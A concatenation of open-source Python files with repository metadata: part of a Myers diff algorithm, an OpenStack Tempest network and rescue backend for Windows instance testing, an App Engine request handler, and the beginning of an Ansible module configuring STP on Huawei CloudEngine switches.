y -= 1
if (not odd_delta and down_min <= k <= down_max and
x <= down_vector[self.downoff + k]):
return x, y, True, True
if old_x - x > self.SNAKE_LIMIT:
big_snake = True
up_vector[self.upoff + k] = x
if find_minimal:
continue
# Heuristics courtesy of GNU diff.
#
# We check occasionally for a diagonal that made lots of progress
# compared with the edit distance. If we have one, find the one
# that made the most progress and return it.
#
# This gives us better, more dense chunks, instead of lots of
# small ones often starting with replaces. It also makes the output
# closer to that of GNU diff, which more people would expect.
if cost > 200 and big_snake:
ret_x, ret_y, best = self._find_diagonal(
down_min, down_max, down_k, 0,
self.downoff, down_vector,
lambda x: x - a_lower,
lambda x: a_lower + self.SNAKE_LIMIT <= x < a_upper,
lambda y: b_lower + self.SNAKE_LIMIT <= y < b_upper,
lambda i, k: i - k,
1, cost)
if best > 0:
return ret_x, ret_y, True, False
ret_x, ret_y, best = self._find_diagonal(
up_min, up_max, up_k, best, self.upoff,
up_vector,
lambda x: a_upper - x,
lambda x: a_lower < x <= a_upper - self.SNAKE_LIMIT,
lambda y: b_lower < y <= b_upper - self.SNAKE_LIMIT,
lambda i, k: i + k,
0, cost)
if best > 0:
return ret_x, ret_y, False, True
if (cost >= max_cost and
self.compat_version >= DiffCompatVersion.MYERS_SMS_COST_BAIL):
# We've reached or gone past the max cost. Just give up now
# and report the halfway point between our best results.
fx_best = bx_best = 0
# Find the forward diagonal that maximized x + y
fxy_best = -1
for d in range(down_max, down_min - 1, -2):
x = min(down_vector[self.downoff + d], a_upper)
y = x - d
if b_upper < y:
x = b_upper + d
y = b_upper
if fxy_best < x + y:
fxy_best = x + y
fx_best = x
# Find the backward diagonal that minimizes x + y
bxy_best = self.max_lines
for d in range(up_max, up_min - 1, -2):
x = max(a_lower, up_vector[self.upoff + d])
y = x - d
if y < b_lower:
x = b_lower + d
y = b_lower
if x + y < bxy_best:
bxy_best = x + y
bx_best = x
# Use the better of the two diagonals
if a_upper + b_upper - bxy_best < \
fxy_best - (a_lower + b_lower):
return fx_best, fxy_best - fx_best, True, False
else:
return bx_best, bxy_best - bx_best, False, True
raise Exception("The function should not have reached here.")
def _find_diagonal(self, minimum, maximum, k, best, diagoff, vector,
vdiff_func, check_x_range, check_y_range,
discard_index, k_offset, cost):
for d in range(maximum, minimum - 1, -2):
dd = d - k
x = vector[diagoff + d]
y = x - d
v = vdiff_func(x) * 2 + dd
if v > 12 * (cost + abs(dd)):
if v > best and \
check_x_range(x) and check_y_range(y):
# We found a sufficient diagonal.
k = k_offset
x_index = discard_index(x, k)
y_index = discard_index(y, k)
while (self.a_data.undiscarded[x_index] ==
self.b_data.undiscarded[y_index]):
if k == self.SNAKE_LIMIT - 1 + k_offset:
return x, y, v
k += 1
return 0, 0, 0
def _lcs(self, a_lower, a_upper, b_lower, b_upper, find_minimal):
"""
The divide-and-conquer implementation of the Longest Common
Subsequence (LCS) algorithm.
"""
# Fast walkthrough equal lines at the start
while (a_lower < a_upper and b_lower < b_upper and
(self.a_data.undiscarded[a_lower] ==
self.b_data.undiscarded[b_lower])):
a_lower += 1
b_lower += 1
while (a_upper > a_lower and b_upper > b_lower and
(self.a_data.undiscarded[a_upper - 1] ==
self.b_data.undiscarded[b_upper - 1])):
a_upper -= 1
b_upper -= 1
if a_lower == a_upper:
# Inserted lines.
while b_lower < b_upper:
self.b_data.modified[self.b_data.real_indexes[b_lower]] = True
b_lower += 1
elif b_lower == b_upper:
# Deleted lines
while a_lower < a_upper:
self.a_data.modified[self.a_data.real_indexes[a_lower]] = True
a_lower += 1
else:
# Find the middle snake and length of an optimal path for A and B
x, y, low_minimal, high_minimal = \
self._find_sms(a_lower, a_upper, b_lower, b_upper,
find_minimal)
self._lcs(a_lower, x, b_lower, y, low_minimal)
self._lcs(x, a_upper, y, b_upper, high_minimal)
def _shift_chunks(self, data, other_data):
"""
Shifts the inserts/deletes of identical lines in order to join
the changes together a bit more. This has the effect of cleaning
up the diff.
Often times, a generated diff will have two identical lines before
and after a chunk (say, a blank line). The default algorithm will
insert at the front of that range and include two blank lines at the
end, but that does not always produce the best looking diff. Since
the two lines are identical, we can shift the chunk so that the line
appears both before and after the line, rather than only after.
"""
i = j = 0
i_end = data.length
while True:
# Scan forward in order to find the start of a run of changes.
while i < i_end and not data.modified.get(i, False):
i += 1
while other_data.modified.get(j, False):
j += 1
if i == i_end:
return
start = i
# Find the end of these changes
i += 1
while data.modified.get(i, False):
i += 1
while other_data.modified.get(j, False):
j += 1
while True:
run_length = i - start
# Move the changed chunks back as long as the previous
# unchanged line matches the last changed line.
# This merges with the previous changed chunks.
while start != 0 and data.data[start - 1] == data.data[i - 1]:
start -= 1
i -= 1
data.modified[start] = True
data.modified[i] = False
while data.modified.get(start - 1, False):
start -= 1
j -= 1
while other_data.modified.get(j, False):
j -= 1
# The end of the changed run at the last point where it
# corresponds to the changed run in the other data set.
# If it's equal to i_end, then we didn't find a corresponding
# point.
if other_data.modified.get(j - 1, False):
corresponding = i
else:
corresponding = i_end
# Move the changed region forward as long as the first
# changed line is the same as the following unchanged line.
while i != i_end and data.data[start] == data.data[i]:
data.modified[start] = False
data.modified[i] = True
start += 1
i += 1
while data.modified.get(i, False):
i += 1
j += 1
while other_data.modified.get(j, False):
j += 1
corresponding = i
if run_length == i - start:
break
# Move the fully-merged run back to a corresponding run in the
# other data set, if we can.
while corresponding < i:
start -= 1
i -= 1
data.modified[start] = True
data.modified[i] = False
j -= 1
while other_data.modified.get(j, False):
j -= 1
def _discard_confusing_lines(self):
    """Discard lines unlikely to match between the two data sets.

    Structure closely follows GNU diff's ``discard_confusable_lines``
    heuristic: a line whose content code never occurs on the other side
    is discarded outright (DISCARD_FOUND); a line occurring far too
    often is provisionally discarded (DISCARD_CANCEL).  Runs of
    discards are then sanity-checked, and the surviving lines are
    copied into the ``undiscarded`` arrays used by the core algorithm.
    """
    def build_discard_list(data, discards, counts):
        # Mark each line: FOUND when it has no match on the other side,
        # CANCEL (provisional) when it is suspiciously common.
        # NOTE(review): integer division under Python 2; use // when
        # porting to Python 3.
        many = 5 * self._very_approx_sqrt(data.length / 64)
        for i, item in enumerate(data.data):
            if item != 0:
                num_matches = counts[item]
                if num_matches == 0:
                    discards[i] = self.DISCARD_FOUND
                elif num_matches > many:
                    discards[i] = self.DISCARD_CANCEL

    def scan_run(discards, i, length, index_func):
        # Scan a run of discards from one end (direction is chosen by
        # index_func), cancelling provisional discards until 3 definite
        # discards in a row are seen, or the first definite discard at
        # least 8 lines in.
        consec = 0
        for j in range(length):
            index = index_func(i, j)
            discard = discards[index]
            if j >= 8 and discard == self.DISCARD_FOUND:
                break
            if discard == self.DISCARD_FOUND:
                consec += 1
            else:
                consec = 0
                if discard == self.DISCARD_CANCEL:
                    discards[index] = self.DISCARD_NONE
            if consec == 3:
                break

    def check_discard_runs(data, discards):
        i = 0
        while i < data.length:
            # Cancel the provisional discards that are not in the middle
            # of a run of discards
            if discards[i] == self.DISCARD_CANCEL:
                discards[i] = self.DISCARD_NONE
            elif discards[i] == self.DISCARD_FOUND:
                # We found a provisional discard
                provisional = 0
                # Find the end of this run of discardable lines and count
                # how many are provisionally discardable.
                j = i
                while j < data.length:
                    if discards[j] == self.DISCARD_NONE:
                        break
                    elif discards[j] == self.DISCARD_CANCEL:
                        provisional += 1
                    j += 1
                # Cancel the provisional discards at the end and shrink
                # the run.
                while j > i and discards[j - 1] == self.DISCARD_CANCEL:
                    j -= 1
                    discards[j] = 0
                    provisional -= 1
                length = j - i
                # If 1/4 of the lines are provisional, cancel discarding
                # all the provisional lines in the run.
                if provisional * 4 > length:
                    while j > i:
                        j -= 1
                        if discards[j] == self.DISCARD_CANCEL:
                            discards[j] = self.DISCARD_NONE
                else:
                    # Cancel any subrun of at least `minimum` consecutive
                    # provisional discards inside the larger run.
                    minimum = 1 + self._very_approx_sqrt(length / 4)
                    j = 0
                    consec = 0
                    while j < length:
                        if discards[i + j] != self.DISCARD_CANCEL:
                            consec = 0
                        else:
                            consec += 1
                            if minimum == consec:
                                # Back up to re-cancel the whole subrun.
                                j -= consec
                            elif minimum < consec:
                                discards[i + j] = self.DISCARD_NONE
                        j += 1
                    # Validate both ends of the run, then advance i to
                    # the run's last line (outer loop adds the final +1).
                    scan_run(discards, i, length, lambda x, y: x + y)
                    i += length - 1
                    scan_run(discards, i, length, lambda x, y: x - y)
            i += 1

    def discard_lines(data, discards):
        # Compact the kept lines into `undiscarded`, remembering their
        # original positions; discarded lines are pre-marked modified.
        j = 0
        for i, item in enumerate(data.data):
            if self.minimal_diff or discards[i] == self.DISCARD_NONE:
                data.undiscarded[j] = item
                data.real_indexes[j] = i
                j += 1
            else:
                data.modified[i] = True
        data.undiscarded_lines = j

    self.a_data.undiscarded = [0] * self.a_data.length
    self.b_data.undiscarded = [0] * self.b_data.length
    self.a_data.real_indexes = [0] * self.a_data.length
    self.b_data.real_indexes = [0] * self.b_data.length
    a_discarded = [0] * self.a_data.length
    b_discarded = [0] * self.b_data.length
    # Count occurrences of every content code on each side.
    a_code_counts = [0] * (1 + self.last_code)
    b_code_counts = [0] * (1 + self.last_code)
    for item in self.a_data.data:
        a_code_counts[item] += 1
    for item in self.b_data.data:
        b_code_counts[item] += 1
    # Each side is judged against the other side's counts.
    build_discard_list(self.a_data, a_discarded, b_code_counts)
    build_discard_list(self.b_data, b_discarded, a_code_counts)
    check_discard_runs(self.a_data, a_discarded)
    check_discard_runs(self.b_data, b_discarded)
    discard_lines(self.a_data, a_discarded)
    discard_lines(self.b_data, b_discarded)
def _very_approx_sqrt(self, i):
result = 1
i /= 4
while i > 0:
i /= 4
result *= 2
return result
| mit |
stefan-caraiman/cloudbase-init-ci | argus/backends/tempest/cloud.py | 3 | 8574 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from argus.backends.tempest import tempest_backend
from argus import config as argus_config
from argus import exceptions
from argus import util
# NOTE(review): presumably importing tempest modules tampers with
# sys.excepthook; restore_excepthook guards the import — confirm in
# argus.util.
with util.restore_excepthook():
    from tempest.common import dynamic_creds
    from tempest.common import waiters

CONFIG = argus_config.CONFIG

# IPv4-mapped IPv6 CIDR used for the static-configuration subnet.
SUBNET6_CIDR = "::ffff:a00:0/120"
# IPv4-mapped IPv6 forms of the default DNS servers
# (::ffff:808:808 == 8.8.8.8, ::ffff:808:404 == 8.8.4.4).
DNSES6 = ["::ffff:808:808", "::ffff:808:404"]
class NetworkWindowsBackend(tempest_backend.BaseWindowsTempestBackend):
    """Back-end for providing static network configuration.

    Creates an additional internal network which will be
    bound explicitly with the new created instance.
    """

    def _get_isolated_network(self):
        """Returns the network itself from the isolated network resources.

        This works only with the isolated credentials and
        this step is achieved by allowing/forcing tenant isolation.
        """
        # Extract the just created private network.
        return self._manager.primary_credentials().network

    def _get_networks(self):
        """Explicitly gather and return the private networks.

        All these networks will be attached to the newly created
        instance without letting nova to handle this part.
        """
        _networks = self._manager.networks_client.list_networks()
        try:
            _networks = _networks["networks"]
        except KeyError:
            raise exceptions.ArgusError('Networks not found.')
        # Keep only non-external (private) networks.
        networks = [net["id"] for net in _networks
                    if not net["router:external"]]
        # Put in front the main private network.
        head = self._get_isolated_network()["id"]
        networks.remove(head)
        networks.insert(0, head)
        # Adapt the list to a format accepted by the API.
        return [{"uuid": net} for net in networks]

    def _create_private_network(self):
        """Create an extra private network to be attached.

        This network is the one with disabled DHCP and
        ready for static configuration by Cloudbase-Init.
        """
        tenant_id = self._manager.primary_credentials().tenant_id
        # pylint: disable=protected-access
        net_resources = self._manager.isolated_creds._create_network_resources(
            tenant_id)
        # Store the network for later cleanup, shaped like a credentials
        # object so the provider's cleanup path can process it.
        key = "fake"
        fake_net_creds = util.get_namedtuple(
            "FakeCreds",
            ("network", "subnet", "router",
             "user_id", "tenant_id", "username", "tenant_name"),
            net_resources + (None,) * 4)
        self._manager.isolated_creds._creds[key] = fake_net_creds
        # Disable DHCP for this network to test static configuration and
        # also add default DNS name servers.
        subnet_id = fake_net_creds.subnet["id"]
        subnets_client = self._manager.subnets_client
        subnets_client.update_subnet(
            subnet_id, enable_dhcp=False,
            dns_nameservers=CONFIG.argus.dns_nameservers)
        # Change the allocation pool to configure any IP,
        # other the one used already with dynamic settings.
        allocation_pools = subnets_client.show_subnet(subnet_id)["subnet"][
            "allocation_pools"]
        allocation_pools[0]["start"] = util.next_ip(
            allocation_pools[0]["start"], step=2)
        subnets_client.update_subnet(subnet_id,
                                     allocation_pools=allocation_pools)
        # Create and attach an IPv6 subnet for this network. Also, register
        # it for later cleanup.
        subnet6_name = util.rand_name(self.__class__.__name__) + "-subnet6"
        network_id = fake_net_creds.network["id"]
        subnets_client.create_subnet(
            network_id=network_id,
            cidr=SUBNET6_CIDR,
            name=subnet6_name,
            dns_nameservers=DNSES6,
            tenant_id=tenant_id,
            enable_dhcp=False,
            ip_version=6)

    def setup_instance(self):
        """Create the extra network, then run the normal instance setup."""
        # Just like a normal preparer, but this time
        # with explicitly specified attached networks.
        if not isinstance(self._manager.isolated_creds,
                          dynamic_creds.DynamicCredentialProvider):
            raise exceptions.ArgusError(
                "Network resources are not available."
            )
        self._create_private_network()
        self._networks = self._get_networks()
        super(NetworkWindowsBackend, self).setup_instance()

    @staticmethod
    def _find_ip_address(port, subnet_id):
        """Return the port's IP on *subnet_id*, or None if not present."""
        for fixed_ip in port["fixed_ips"]:
            if fixed_ip["subnet_id"] == subnet_id:
                return fixed_ip["ip_address"]

    def get_network_interfaces(self):
        """Retrieve and parse network details from the compute node."""
        ports_client = self._manager.ports_client
        networks_client = self._manager.networks_client
        subnets_client = self._manager.subnets_client
        guest_nics = []
        for network in self._networks or []:
            network_id = network["uuid"]
            net_details = networks_client.show_network(network_id)["network"]
            nic = dict.fromkeys(util.NETWORK_KEYS)
            for subnet_id in net_details["subnets"]:
                details = subnets_client.show_subnet(subnet_id)["subnet"]
                # The network interface should follow the format found under
                # `windows.InstanceIntrospection.get_network_interfaces`
                # method or `argus.util.NETWORK_KEYS` model.
                v6switch = details["ip_version"] == 6
                v6suffix = "6" if v6switch else ""
                nic["dhcp"] = details["enable_dhcp"]
                nic["dns" + v6suffix] = details["dns_nameservers"]
                nic["gateway" + v6suffix] = details["gateway_ip"]
                # IPv6 keeps the prefix length; IPv4 is converted to a
                # dotted-quad netmask.
                nic["netmask" + v6suffix] = (
                    details["cidr"].split("/")[1] if v6switch
                    else util.cidr2netmask(details["cidr"]))
                # Find rest of the details under the ports using this subnet.
                # There should be no conflicts because on the current
                # architecture every instance is using its own router,
                # subnet and network accessible only to it.
                ports = ports_client.list_ports()["ports"]
                for port in ports:
                    # Select instance related ports only, with the
                    # corresponding subnet ID.
                    if "compute" not in port["device_owner"]:
                        continue
                    ip_address = self._find_ip_address(port, subnet_id)
                    if not ip_address:
                        continue
                    nic["mac"] = port["mac_address"].upper()
                    nic["address" + v6suffix] = ip_address
                    break
            guest_nics.append(nic)
        return guest_nics
class RescueWindowsBackend(tempest_backend.BaseWindowsTempestBackend):
    """Instance rescue Windows-based back-end."""

    def rescue_server(self):
        """Rescue the underlying instance."""
        servers = self._manager.servers_client
        instance_id = self.internal_instance_id()
        servers.rescue_server(
            instance_id,
            adminPass=CONFIG.openstack.image_password)
        # Block until the compute service reports the rescued state.
        waiters.wait_for_server_status(servers, instance_id, 'RESCUE')

    def unrescue_server(self):
        """Unrescue the underlying instance."""
        servers = self._manager.servers_client
        instance_id = self.internal_instance_id()
        servers.unrescue_server(instance_id)
        # Block until the instance is back to normal operation.
        waiters.wait_for_server_status(servers, instance_id, 'ACTIVE')
| apache-2.0 |
mark-ignacio/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/handlers/updatebase.py | 143 | 1902 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.api import users
from google.appengine.ext import webapp, db
class UpdateBase(webapp.RequestHandler):
    """Shared helpers for the update request handlers."""

    def _int_from_request(self, name):
        """Return the request parameter *name* parsed as an int.

        Returns None when the parameter is missing, empty, or not a
        valid integer literal.
        """
        string_value = self.request.get(name)
        try:
            return int(string_value)
        # BUG FIX: the original `except ValueError, TypeError:` only
        # caught ValueError (binding the exception to the name
        # TypeError), so int(None) raised TypeError to the caller.
        # The tuple form catches both, on Python 2 and Python 3.
        except (ValueError, TypeError):
            return None
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/cloudengine/ce_stp.py | 39 | 37593 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Standard Ansible module metadata: preview-grade, community-supported.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_stp
version_added: "2.4"
short_description: Manages STP configuration on HUAWEI CloudEngine switches.
description:
- Manages STP configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
state:
description:
- Specify desired state of the resource.
required: false
default: present
choices: ['present', 'absent']
stp_mode:
description:
- Set an operation mode for the current MSTP process.
The mode can be STP, RSTP, or MSTP.
required: false
default: null
choices: ['stp', 'rstp', 'mstp']
stp_enable:
description:
- Enable or disable STP on a switch.
required: false
default: null
choices: ['enable', 'disable']
stp_converge:
description:
- STP convergence mode.
Fast means set STP aging mode to Fast.
Normal means set STP aging mode to Normal.
required: false
default: null
choices: ['fast', 'normal']
bpdu_protection:
description:
- Configure BPDU protection on an edge port.
This function prevents network flapping caused by attack packets.
required: false
default: null
choices: ['enable', 'disable']
tc_protection:
description:
- Configure the TC BPDU protection function for an MSTP process.
required: false
default: null
choices: ['enable', 'disable']
tc_protection_interval:
description:
- Set the time the MSTP device takes to handle the maximum number of TC BPDUs
and immediately refresh forwarding entries.
The value is an integer ranging from 1 to 600, in seconds.
required: false
default: null
tc_protection_threshold:
description:
- Set the maximum number of TC BPDUs that the MSTP can handle.
The value is an integer ranging from 1 to 255. The default value is 1 on the switch.
required: false
default: null
interface:
description:
- Interface name.
If the value is C(all), will apply configuration to all interfaces.
If the value is a special name, only the full name is supported as input.
required: false
default: null
edged_port:
description:
- Set the current port as an edge port.
required: false
default: null
choices: ['enable', 'disable']
bpdu_filter:
description:
- Specify a port as a BPDU filter port.
required: false
default: null
choices: ['enable', 'disable']
cost:
description:
- Set the path cost of the current port.
The default instance is 0.
required: false
default: null
root_protection:
description:
- Enable root protection on the current port.
required: false
default: null
choices: ['enable', 'disable']
loop_protection:
description:
- Enable loop protection on the current port.
required: false
default: null
choices: ['enable', 'disable']
'''
EXAMPLES = '''
- name: CloudEngine stp test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config stp mode"
ce_stp:
state: present
stp_mode: stp
provider: "{{ cli }}"
- name: "Undo stp mode"
ce_stp:
state: absent
stp_mode: stp
provider: "{{ cli }}"
- name: "Enable bpdu protection"
ce_stp:
state: present
bpdu_protection: enable
provider: "{{ cli }}"
- name: "Disable bpdu protection"
ce_stp:
state: present
bpdu_protection: disable
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"bpdu_protection": "enable",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {"bpdu_protection": "disable"}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"bpdu_protection": "enable"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["stp bpdu-protection"]
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class Stp(object):
""" Manages stp/rstp/mstp configuration """
def __init__(self, **kwargs):
    """Initialize the Stp helper from the Ansible argument spec."""

    # Ansible module plumbing; check mode is supported.
    argument_spec = kwargs["argument_spec"]
    self.spec = argument_spec
    self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)

    # Raw CLI configuration fetched from the device (filled lazily).
    self.cur_cfg = dict()
    self.stp_cfg = None
    self.interface_stp_cfg = None

    # Module arguments; falsy values (e.g. empty strings) are
    # normalized to None by the `or None` pattern.
    self.state = self.module.params['state'] or None
    self.stp_mode = self.module.params['stp_mode'] or None
    self.stp_enable = self.module.params['stp_enable'] or None
    self.stp_converge = self.module.params['stp_converge'] or None
    self.interface = self.module.params['interface'] or None
    self.edged_port = self.module.params['edged_port'] or None
    self.bpdu_filter = self.module.params['bpdu_filter'] or None
    self.cost = self.module.params['cost'] or None
    self.bpdu_protection = self.module.params['bpdu_protection'] or None
    self.tc_protection = self.module.params['tc_protection'] or None
    self.tc_protection_interval = self.module.params['tc_protection_interval'] or None
    self.tc_protection_threshold = self.module.params['tc_protection_threshold'] or None
    self.root_protection = self.module.params['root_protection'] or None
    self.loop_protection = self.module.params['loop_protection'] or None

    # Result bookkeeping reported back to Ansible.
    self.changed = False
    self.updates_cmd = list()
    self.results = dict()
    self.proposed = dict()
    self.existing = dict()
    self.end_state = dict()
def cli_load_config(self, commands):
    """Send *commands* to the device; a no-op in check mode."""
    if self.module.check_mode:
        return
    load_config(self.module, commands)
def cli_get_stp_config(self):
    """Cache the device's global STP-related configuration lines."""
    self.stp_cfg = get_config(self.module, ["| include stp"])
def cli_get_interface_stp_config(self):
    """Cache the configured interface's CLI section, validating it."""
    if not self.interface:
        return
    section_filter = (
        "| ignore-case section include ^interface %s$" % self.interface)
    tmp_cfg = get_config(self.module, [section_filter])
    # An empty section means the interface does not exist at all.
    if not tmp_cfg:
        self.module.fail_json(
            msg='Error: The interface %s is not exist.' % self.interface)
    # STP settings only apply to layer-2 (switched) interfaces.
    if "undo portswitch" in tmp_cfg:
        self.module.fail_json(
            msg='Error: The interface %s is not switch mode.' % self.interface)
    self.interface_stp_cfg = tmp_cfg
def check_params(self):
    """Validate module parameters; fail_json on the first violation."""

    # cost must be a decimal string in [1, 200000000].
    if self.cost:
        if self.cost.isdigit():
            if int(self.cost) < 1 or int(self.cost) > 200000000:
                self.module.fail_json(
                    msg='Error: The value of cost is out of [1 - 200000000].')
        else:
            self.module.fail_json(
                msg='Error: The cost is not digit.')

    # tc_protection_interval must be a decimal string in [1, 600] seconds.
    if self.tc_protection_interval:
        if self.tc_protection_interval.isdigit():
            if int(self.tc_protection_interval) < 1 or int(self.tc_protection_interval) > 600:
                self.module.fail_json(
                    msg='Error: The value of tc_protection_interval is out of [1 - 600].')
        else:
            self.module.fail_json(
                msg='Error: The tc_protection_interval is not digit.')

    # tc_protection_threshold must be a decimal string in [1, 255].
    if self.tc_protection_threshold:
        if self.tc_protection_threshold.isdigit():
            if int(self.tc_protection_threshold) < 1 or int(self.tc_protection_threshold) > 255:
                self.module.fail_json(
                    msg='Error: The value of tc_protection_threshold is out of [1 - 255].')
        else:
            self.module.fail_json(
                msg='Error: The tc_protection_threshold is not digit.')

    # Per-interface settings need a single, concrete interface name.
    if self.root_protection or self.loop_protection or self.cost:
        if not self.interface:
            self.module.fail_json(
                msg='Error: Please input interface.')
        elif self.interface == "all":
            self.module.fail_json(
                msg='Error: Interface can not be all when config root_protection or loop_protection or cost.')

    # root-protection and loop-protection are mutually exclusive.
    if self.root_protection and self.root_protection == "enable":
        if self.loop_protection and self.loop_protection == "enable":
            self.module.fail_json(
                msg='Error: Can not enable root_protection and loop_protection at the same interface.')

    # edged_port / bpdu_filter accept "all" but still need an interface.
    if self.edged_port or self.bpdu_filter:
        if not self.interface:
            self.module.fail_json(
                msg='Error: Please input interface.')
def get_proposed(self):
""" Get module proposed """
self.proposed["state"] = self.state
if self.stp_mode:
self.proposed["stp_mode"] = self.stp_mode
if self.stp_enable:
self.proposed["stp_enable"] = self.stp_enable
if self.stp_converge:
self.proposed["stp_converge"] = self.stp_converge
if self.interface:
self.proposed["interface"] = self.interface
if self.edged_port:
self.proposed["edged_port"] = self.edged_port
if self.bpdu_filter:
self.proposed["bpdu_filter"] = self.bpdu_filter
if self.cost:
self.proposed["cost"] = self.cost
if self.bpdu_protection:
self.proposed["bpdu_protection"] = self.bpdu_protection
if self.tc_protection:
self.proposed["tc_protection"] = self.tc_protection
if self.tc_protection_interval:
self.proposed["tc_protection_interval"] = self.tc_protection_interval
if self.tc_protection_threshold:
self.proposed["tc_protection_threshold"] = self.tc_protection_threshold
if self.root_protection:
self.proposed["root_protection"] = self.root_protection
if self.loop_protection:
self.proposed["loop_protection"] = self.loop_protection
def get_existing(self):
    """Read the device's current STP state for every requested option.

    Results are stored twice: in ``self.cur_cfg`` (used later to decide
    which commands to issue) and in ``self.existing`` (reported back to
    Ansible).
    """

    self.cli_get_stp_config()
    if self.interface and self.interface != "all":
        self.cli_get_interface_stp_config()

    if self.stp_mode:
        # mstp is the device default, so absence of an explicit mode
        # line means mstp.
        if "stp mode stp" in self.stp_cfg:
            self.cur_cfg["stp_mode"] = "stp"
            self.existing["stp_mode"] = "stp"
        elif "stp mode rstp" in self.stp_cfg:
            self.cur_cfg["stp_mode"] = "rstp"
            self.existing["stp_mode"] = "rstp"
        else:
            self.cur_cfg["stp_mode"] = "mstp"
            self.existing["stp_mode"] = "mstp"

    if self.stp_enable:
        if "stp disable" in self.stp_cfg:
            self.cur_cfg["stp_enable"] = "disable"
            self.existing["stp_enable"] = "disable"
        else:
            self.cur_cfg["stp_enable"] = "enable"
            self.existing["stp_enable"] = "enable"

    if self.stp_converge:
        if "stp converge fast" in self.stp_cfg:
            self.cur_cfg["stp_converge"] = "fast"
            self.existing["stp_converge"] = "fast"
        else:
            self.cur_cfg["stp_converge"] = "normal"
            self.existing["stp_converge"] = "normal"

    if self.edged_port:
        # "all" is a global default; otherwise look at the interface
        # section.
        if self.interface == "all":
            if "stp edged-port default" in self.stp_cfg:
                self.cur_cfg["edged_port"] = "enable"
                self.existing["edged_port"] = "enable"
            else:
                self.cur_cfg["edged_port"] = "disable"
                self.existing["edged_port"] = "disable"
        else:
            if "stp edged-port enable" in self.interface_stp_cfg:
                self.cur_cfg["edged_port"] = "enable"
                self.existing["edged_port"] = "enable"
            else:
                self.cur_cfg["edged_port"] = "disable"
                self.existing["edged_port"] = "disable"

    if self.bpdu_filter:
        if self.interface == "all":
            if "stp bpdu-filter default" in self.stp_cfg:
                self.cur_cfg["bpdu_filter"] = "enable"
                self.existing["bpdu_filter"] = "enable"
            else:
                self.cur_cfg["bpdu_filter"] = "disable"
                self.existing["bpdu_filter"] = "disable"
        else:
            if "stp bpdu-filter enable" in self.interface_stp_cfg:
                self.cur_cfg["bpdu_filter"] = "enable"
                self.existing["bpdu_filter"] = "enable"
            else:
                self.cur_cfg["bpdu_filter"] = "disable"
                self.existing["bpdu_filter"] = "disable"

    if self.bpdu_protection:
        if "stp bpdu-protection" in self.stp_cfg:
            self.cur_cfg["bpdu_protection"] = "enable"
            self.existing["bpdu_protection"] = "enable"
        else:
            self.cur_cfg["bpdu_protection"] = "disable"
            self.existing["bpdu_protection"] = "disable"

    if self.tc_protection:
        if "stp tc-protection" in self.stp_cfg:
            self.cur_cfg["tc_protection"] = "enable"
            self.existing["tc_protection"] = "enable"
        else:
            self.cur_cfg["tc_protection"] = "disable"
            self.existing["tc_protection"] = "disable"

    if self.tc_protection_interval:
        if "stp tc-protection interval" in self.stp_cfg:
            tmp_value = re.findall(r'stp tc-protection interval (.*)', self.stp_cfg)
            if not tmp_value:
                self.module.fail_json(
